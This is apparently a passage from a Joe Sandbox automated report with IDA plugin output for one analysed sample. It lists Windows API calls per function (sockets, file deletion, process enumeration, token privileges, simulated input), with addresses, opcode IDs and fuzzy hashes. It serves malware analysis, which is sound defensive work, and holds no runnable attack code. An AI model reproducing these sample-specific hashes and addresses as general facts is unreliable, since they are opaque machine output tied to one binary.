                        • Instruction Fuzzy Hash: C7014972650251ABEB1662B69C86FFF72DCA708790F144821FC03E31D3E6B49C4481A0
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A01276
                        • WSAGetLastError.WSOCK32 ref: 00A01283
                        • bind.WSOCK32(00000000,?,00000010), ref: 00A012BA
                        • WSAGetLastError.WSOCK32 ref: 00A012C5
                        • closesocket.WSOCK32(00000000), ref: 00A012F4
                        • listen.WSOCK32(00000000,00000005), ref: 00A01303
                        • WSAGetLastError.WSOCK32 ref: 00A0130D
                        • closesocket.WSOCK32(00000000), ref: 00A0133C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLast$closesocket$bindlistensocket
                        • String ID:
                        • API String ID: 540024437-0
                        • Opcode ID: 20822531e79c8fdfc4ecfd778e28a340cabecaa48b81d2d5b198792db2bea879
                        • Instruction ID: b156730e1f2438357b20b814dc2b0175e18c103e8637b36d4aa1cf65ea985975
                        • Opcode Fuzzy Hash: 20822531e79c8fdfc4ecfd778e28a340cabecaa48b81d2d5b198792db2bea879
                        • Instruction Fuzzy Hash: 44416171A001049FD710DF64D484BA9BBE5AF8A328F188198E8569F2D2C771ED82CBE1
                        APIs
                          • Part of subcall function 00983AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00983A97,?,?,00982E7F,?,?,?,00000000), ref: 00983AC2
                          • Part of subcall function 009EE199: GetFileAttributesW.KERNEL32(?,009ECF95), ref: 009EE19A
                        • FindFirstFileW.KERNEL32(?,?), ref: 009ED420
                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 009ED470
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009ED481
                        • FindClose.KERNEL32(00000000), ref: 009ED498
                        • FindClose.KERNEL32(00000000), ref: 009ED4A1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                        • String ID: \*.*
                        • API String ID: 2649000838-1173974218
                        • Opcode ID: 4836b4977d9979cb26766df3d333865138da2806662b18542be7dee94f491915
                        • Instruction ID: 3eb4008e75c4162c7ed8d7f56e46e75b0f395c44249bfb2a9df6af9a4a3e6d7d
                        • Opcode Fuzzy Hash: 4836b4977d9979cb26766df3d333865138da2806662b18542be7dee94f491915
                        • Instruction Fuzzy Hash: 95314F710093859FC305FF64D8919AFB7A8AEE5314F448A1EF4D1522E1FB35AE098763
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: 3178a6b6dca99dabbb24f07e23ff44aa9f0e88817b4f06eb187c6ff645702daa
                        • Instruction ID: e40e6341e13223f4ecc4e4afc9c95d0fede2666e839a7a762a3cc9fc49d406df
                        • Opcode Fuzzy Hash: 3178a6b6dca99dabbb24f07e23ff44aa9f0e88817b4f06eb187c6ff645702daa
                        • Instruction Fuzzy Hash: 43C25C71E046288FDB25CF28DE507EAB7B9EB85314F1445EAD44DE7241E778AE818F40
                        APIs
                        • _wcslen.LIBCMT ref: 009F64DC
                        • CoInitialize.OLE32(00000000), ref: 009F6639
                        • CoCreateInstance.OLE32(00A1FCF8,00000000,00000001,00A1FB68,?), ref: 009F6650
                        • CoUninitialize.OLE32 ref: 009F68D4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 886957087-24824748
                        • Opcode ID: a812dd594d154f608c609563f67f806fbf3daf4117d72ecbab943f8f583d1f92
                        • Instruction ID: f24aa4de5dee947509c7ed0c7613113d94649349e730deb5700ff0884b797ea4
                        • Opcode Fuzzy Hash: a812dd594d154f608c609563f67f806fbf3daf4117d72ecbab943f8f583d1f92
                        • Instruction Fuzzy Hash: 37D14771508305AFD304EF24C881A6BB7E8FFD8704F14496DF5959B2A1EB71E909CBA2
                        APIs
                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00A022E8
                          • Part of subcall function 009FE4EC: GetWindowRect.USER32(?,?), ref: 009FE504
                        • GetDesktopWindow.USER32 ref: 00A02312
                        • GetWindowRect.USER32(00000000), ref: 00A02319
                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A02355
                        • GetCursorPos.USER32(?), ref: 00A02381
                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A023DF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                        • String ID:
                        • API String ID: 2387181109-0
                        • Opcode ID: f4589c0cfb366630386baa2a4d65320a4ede1faf619d9f4520c070797f357885
                        • Instruction ID: 9c1d843e177fc0f13dca1bc2474789fc8d2b6c7d197f10242caca0825a558a11
                        • Opcode Fuzzy Hash: f4589c0cfb366630386baa2a4d65320a4ede1faf619d9f4520c070797f357885
                        • Instruction Fuzzy Hash: 77310072144309AFC720DF54D848B9BBBEAFF84720F004919F9949B191DB34EA09CB92
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 009F9B78
                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 009F9C8B
                          • Part of subcall function 009F3874: GetInputState.USER32 ref: 009F38CB
                          • Part of subcall function 009F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009F3966
                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 009F9BA8
                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 009F9C75
                        Strings
                        Similarity
                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                        • String ID: *.*
                        • API String ID: 1972594611-438819550
                        • Opcode ID: a6042b7cbe9942dc3f9e55f5d950c88f3576a3168aa88ba9b4ab4cb560a3f5a2
                        • Instruction ID: 005b2b8fe4840af436a0d953e47155a1843974b9bb012cd9fb7434fbf9ebd1c3
                        • Opcode Fuzzy Hash: a6042b7cbe9942dc3f9e55f5d950c88f3576a3168aa88ba9b4ab4cb560a3f5a2
                        • Instruction Fuzzy Hash: B441617194420EAFCF14EFA4C845BFE7BB8EF45311F148156E959A2291EB309E85CF60
                        APIs
                          • Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2
                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00999A4E
                        • GetSysColor.USER32(0000000F), ref: 00999B23
                        • SetBkColor.GDI32(?,00000000), ref: 00999B36
                        Similarity
                        • API ID: Color$LongProcWindow
                        • String ID:
                        • API String ID: 3131106179-0
                        • Opcode ID: d55eb680deb26687ec5b3d5adcf665e260830df5820aa152782ebf17c942ff7b
                        • Instruction ID: 687d6db51d23725e2337327d944a05e8ca5b0b7e2b9134cf6a1617bc50e7345f
                        • Opcode Fuzzy Hash: d55eb680deb26687ec5b3d5adcf665e260830df5820aa152782ebf17c942ff7b
                        • Instruction Fuzzy Hash: DBA12970149504BFEF28DABC8C98FBF669DEB86350F14860EF402D6691DA29DD41D272
                        APIs
                          • Part of subcall function 00A0304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A0307A
                          • Part of subcall function 00A0304E: _wcslen.LIBCMT ref: 00A0309B
                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A0185D
                        • WSAGetLastError.WSOCK32 ref: 00A01884
                        • bind.WSOCK32(00000000,?,00000010), ref: 00A018DB
                        • WSAGetLastError.WSOCK32 ref: 00A018E6
                        • closesocket.WSOCK32(00000000), ref: 00A01915
                        Similarity
                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                        • String ID:
                        • API String ID: 1601658205-0
                        • Opcode ID: fedf23f35654e826a764ce0c4d461d757e8122dbe0a09ceed7e13790dd09f20d
                        • Instruction ID: 20eb5b58ad12015abd7c8d47d7c5050cb729c8f478fc71b683dbf1154d0f4c1f
                        • Opcode Fuzzy Hash: fedf23f35654e826a764ce0c4d461d757e8122dbe0a09ceed7e13790dd09f20d
                        • Instruction Fuzzy Hash: 9951A271A00200AFEB10EF64D886F6A77E5AB84718F18C498FA159F3D3D771AD41CBA1
                        APIs
                        Similarity
                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                        • String ID:
                        • API String ID: 292994002-0
                        • Opcode ID: d8f3e3bfb08eaad5f4364efcd678084393a3cdb9c1bd1a900befa3c77c839730
                        • Instruction ID: 4a080e7a5703d0020b35df091b147e6cf9d992db20207ec34b22771a6644831f
                        • Opcode Fuzzy Hash: d8f3e3bfb08eaad5f4364efcd678084393a3cdb9c1bd1a900befa3c77c839730
                        • Instruction Fuzzy Hash: 3521B5317802115FD7209F2AD884FAA7BE5EF85364F198058E946CB351DB71DC82CBD4
                        Strings
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                        • API String ID: 0-1546025612
                        • Opcode ID: 9fcb68debc02c3750969d49dbe6bcf00725382215995be933319fb75302f1ddf
                        • Instruction ID: ec271effbd8fc9756521eae906730df968b335cecc51bebfa5fd66338cfe5909
                        • Opcode Fuzzy Hash: 9fcb68debc02c3750969d49dbe6bcf00725382215995be933319fb75302f1ddf
                        • Instruction Fuzzy Hash: 38A2A371E0021ACBDF24DF58C840BAEB7B5BF54310F6585AAE815A7385EB34AD81CF61
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00A0A6AC
                        • Process32FirstW.KERNEL32(00000000,?), ref: 00A0A6BA
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • Process32NextW.KERNEL32(00000000,?), ref: 00A0A79C
                        • CloseHandle.KERNEL32(00000000), ref: 00A0A7AB
                          • Part of subcall function 0099CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,009C3303,?), ref: 0099CE8A
                        Similarity
                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                        • String ID:
                        • API String ID: 1991900642-0
                        • Opcode ID: c31c03b0493825892a4b7fc8386c7d43c1ec01fb74d734b24e21e6855e917b5d
                        • Instruction ID: 105ae1c124fc02bee40b24b0f5f8bf66a4e22f425ccb2a0813d55f251f2ebc78
                        • Opcode Fuzzy Hash: c31c03b0493825892a4b7fc8386c7d43c1ec01fb74d734b24e21e6855e917b5d
                        • Instruction Fuzzy Hash: BF515BB1508301AFD710EF64D886A6BBBE8FFC9754F00892DF595972A1EB31D904CB92
                        APIs
                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 009EAAAC
                        • SetKeyboardState.USER32(00000080), ref: 009EAAC8
                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 009EAB36
                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 009EAB88
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 794ae3eb13ca35d738b85be6815f7fd1373785b6f314463831e38b654d42a972
                        • Instruction ID: 3159848e0f3555381d2002f5acb8c58092440e24524d749a3e9ed482b1cd2725
                        • Opcode Fuzzy Hash: 794ae3eb13ca35d738b85be6815f7fd1373785b6f314463831e38b654d42a972
                        • Instruction Fuzzy Hash: 98311C30A40288AEFB36CA66CC05BFA77ABAB54320F0C421AF191961F1D374AD85C752
                        APIs
                        • _free.LIBCMT ref: 009BBB7F
                          • Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
                          • Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0
                        • GetTimeZoneInformation.KERNEL32 ref: 009BBB91
                        • WideCharToMultiByte.KERNEL32(00000000,?,00A5121C,000000FF,?,0000003F,?,?), ref: 009BBC09
                        • WideCharToMultiByte.KERNEL32(00000000,?,00A51270,000000FF,?,0000003F,?,?,?,00A5121C,000000FF,?,0000003F,?,?), ref: 009BBC36
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                        • String ID:
                        • API String ID: 806657224-0
                        • Opcode ID: 8495f372c67e9f5dea83a297b740f493b33f80b74480fe5d0a8431f895a339af
                        • Instruction ID: f44483acfd88a18a53161fc61b4d7de701cbc056d5b3f70e8f0314528ce42172
                        • Opcode Fuzzy Hash: 8495f372c67e9f5dea83a297b740f493b33f80b74480fe5d0a8431f895a339af
                        • Instruction Fuzzy Hash: BA31BC70944205EFCB10DFA8CD80ABDBBB8BF45720B1446AAE060DB2A1D7709E42CB50
                        APIs
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 009FCE89
                        • GetLastError.KERNEL32(?,00000000), ref: 009FCEEA
                        • SetEvent.KERNEL32(?,?,00000000), ref: 009FCEFE
                        Similarity
                        • API ID: ErrorEventFileInternetLastRead
                        • String ID:
                        • API String ID: 234945975-0
                        • Opcode ID: 2d87cdaf1f6248c8378273a8d2e5188a67ea2911288233d35b010a5149ea1a76
                        • Instruction ID: 3526e9861fbefeeba35125a51ab3b53032b7cd5c91dbf1e41cc6a6f9dda814b9
                        • Opcode Fuzzy Hash: 2d87cdaf1f6248c8378273a8d2e5188a67ea2911288233d35b010a5149ea1a76
                        • Instruction Fuzzy Hash: B921BDB154030DABDB20DFA5CA48BB6B7FCEF40354F10882EE646D2151E774EE058BA4
                        APIs
                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009E82AA
                        Strings
                        Similarity
                        • API ID: lstrlen
                        • String ID: ($|
                        • API String ID: 1659193697-1631851259
                        • Opcode ID: 821eeb16da05a4165c9a6f05b7d9db5518e6ce69f9e10a32db010c486bdcd871
                        • Instruction ID: 9dbde40b4db1058d3f2fee50dfefa6ddf2869e2151b741b453d413b054d225ae
                        • Opcode Fuzzy Hash: 821eeb16da05a4165c9a6f05b7d9db5518e6ce69f9e10a32db010c486bdcd871
                        • Instruction Fuzzy Hash: 9B323575A007459FCB29CF5AC481A6AB7F0FF48710B15C56EE49ADB3A1EB70E941CB40
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 009F5CC1
                        • FindNextFileW.KERNEL32(00000000,?), ref: 009F5D17
                        • FindClose.KERNEL32(?), ref: 009F5D5F
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: 9521d9616c166a0e9fdda0e8f8e47e4bdc355e8058834303602fca2021691da2
                        • Instruction ID: acf38d53bec854ab4c45fc72113d6c739368baea9b56a8d74d313158dd537868
                        • Opcode Fuzzy Hash: 9521d9616c166a0e9fdda0e8f8e47e4bdc355e8058834303602fca2021691da2
                        • Instruction Fuzzy Hash: 6951BC74604A059FC714DF28C494EA6B7E8FF4A324F15855DEAAA8B3A1DB30EC05CF91
                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 009B271A
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009B2724
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 009B2731
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 8ba52bad7979d20cdd48123285e0ef5abd01c7e2b8591b4f7a1236dec841f49f
                        • Instruction ID: 5faf50c0785520b9c8b9b3e75b4b5630e667aff777cb4117f097ba8d24b5ed5d
                        • Opcode Fuzzy Hash: 8ba52bad7979d20cdd48123285e0ef5abd01c7e2b8591b4f7a1236dec841f49f
                        • Instruction Fuzzy Hash: 5431D5749412189BCB21DF68DD897DCB7B8EF48320F5041EAE41CA7260EB309F818F84
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 009F51DA
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009F5238
                        • SetErrorMode.KERNEL32(00000000), ref: 009F52A1
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID:
                        • API String ID: 1682464887-0
                        • Opcode ID: fadab8b5add0ef56bf10caf51c8e93142e030178088f77a8e8bdb0390aadccd3
                        • Instruction ID: 244b04cb8c2b204da4caa19df6a83178826bdb6b4cbd28b8094c0c9ee108be8f
                        • Opcode Fuzzy Hash: fadab8b5add0ef56bf10caf51c8e93142e030178088f77a8e8bdb0390aadccd3
                        • Instruction Fuzzy Hash: 63314D75A005189FDB00DF94D884FEDBBB4FF49318F098199E905AB362DB31E856CBA0
                        APIs
                          • Part of subcall function 0099FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 009A0668
                          • Part of subcall function 0099FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 009A0685
                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009E170D
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009E173A
                        • GetLastError.KERNEL32 ref: 009E174A
                        Similarity
                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                        • String ID:
                        • API String ID: 577356006-0
                        • Opcode ID: 351005b6a59695e1f48589a8ab0b3078a9b24f55558fb314c0b1117ef83a2d1f
                        • Instruction ID: 2196d0b25f00810fb556aa61d57c482535158e127476e6f2e252759a41cf4d5c
                        • Opcode Fuzzy Hash: 351005b6a59695e1f48589a8ab0b3078a9b24f55558fb314c0b1117ef83a2d1f
                        • Instruction Fuzzy Hash: EC1191B2414305AFD718DF54DC86EAAB7BDEB48B24B20852EE05697681EB71BC41CA24
                        APIs
                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009ED608
                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 009ED645
                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009ED650
                        Similarity
                        • API ID: CloseControlCreateDeviceFileHandle
                        • String ID:
                        • API String ID: 33631002-0
                        • Opcode ID: 9dd52c28d43539317d0d67db154463842ef82b2699f05b262703f9f7be91c1a7
                        • Instruction ID: 711d4dab008f971491603637caba280dc1dc81a4a64debb3575c4d9a75ec14ec
                        • Opcode Fuzzy Hash: 9dd52c28d43539317d0d67db154463842ef82b2699f05b262703f9f7be91c1a7
                        • Instruction Fuzzy Hash: 27117C71E41228BBDB108F959C44FEFBBBCEB45B60F108111F914E7290C2704A018BA1
                        APIs
                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 009E168C
                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009E16A1
                        • FreeSid.ADVAPI32(?), ref: 009E16B1
                        Similarity
                        • API ID: AllocateCheckFreeInitializeMembershipToken
                        • String ID:
                        • API String ID: 3429775523-0
                        • Opcode ID: ceb697ad8f6cd2f36e8fba144e0f0946a37d1f83d5646420da12dcd5b6ab3b82
                        • Instruction ID: b9cb9fc704ec4b73e5196bcc0de1719978f5a4cb3fc8a88f2e8976acfa3e21f1
                        • Opcode Fuzzy Hash: ceb697ad8f6cd2f36e8fba144e0f0946a37d1f83d5646420da12dcd5b6ab3b82
                        • Instruction Fuzzy Hash: BFF0F471990309FBDB00DFE49C89EAEBBBCEB08614F508565E501E2181E774AA448A50
                        APIs
                        • GetCurrentProcess.KERNEL32(009B28E9,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002,00000000,?,009B28E9), ref: 009A4D09
                        • TerminateProcess.KERNEL32(00000000,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002,00000000,?,009B28E9), ref: 009A4D10
                        • ExitProcess.KERNEL32 ref: 009A4D22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: 1f05861985d25584e36922e6f6a0de5bb3a857fbc8f0378d8127062ecd23b030
                        • Instruction ID: 1c6597fcbca0c8a0b4d397faa68d16d0155fcf7fb9e2c3b17f7d1684effa6b1f
                        • Opcode Fuzzy Hash: 1f05861985d25584e36922e6f6a0de5bb3a857fbc8f0378d8127062ecd23b030
                        • Instruction Fuzzy Hash: EDE0B631040148BBCF11AF94DE0AA987B69EB827A5B108014FD198A162DB75EE42CA80
                        APIs
                        • GetUserNameW.ADVAPI32(?,?), ref: 009DD28C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: NameUser
                        • String ID: X64
                        • API String ID: 2645101109-893830106
                        • Opcode ID: f1200cf39c883e5e16e3d8b9eb388311842f0e9bb7ef247dfec48b24b02ea5f4
                        • Instruction ID: a3b068836e5c55bffcf7196f8fc2afe7dfa01b64c80b40e07a17dec0d5f719cb
                        • Opcode Fuzzy Hash: f1200cf39c883e5e16e3d8b9eb388311842f0e9bb7ef247dfec48b24b02ea5f4
                        • Instruction Fuzzy Hash: 85D0C9B484212DEACF94CB90DCC8DD9B37CBB04345F104552F146B2100D73495498F20
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                        • Instruction ID: ce3983a45759edc961097712dcbdacefb6b9c5d1677c656779f90e10e5ebe629
                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                        • Instruction Fuzzy Hash: E1020CB1E002199FDF14CFA9C8806ADBBF5EF89324F254569D819EB384D731AD418BD4
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 009F6918
                        • FindClose.KERNEL32(00000000), ref: 009F6961
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: e62d5922194a85b7eb1fccd739a27aefb73328b6fe9a64dafde5c6b5eca3fb93
                        • Instruction ID: 5520028c039d8a2bb69a03d856b07932bd5452db160db1e67547d9e929a03017
                        • Opcode Fuzzy Hash: e62d5922194a85b7eb1fccd739a27aefb73328b6fe9a64dafde5c6b5eca3fb93
                        • Instruction Fuzzy Hash: B711D0756042009FD710DF69D484A26BBE4FF84328F14C699F5698F3A2C770EC45CB90
                        APIs
                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A04891,?,?,00000035,?), ref: 009F37E4
                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A04891,?,?,00000035,?), ref: 009F37F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
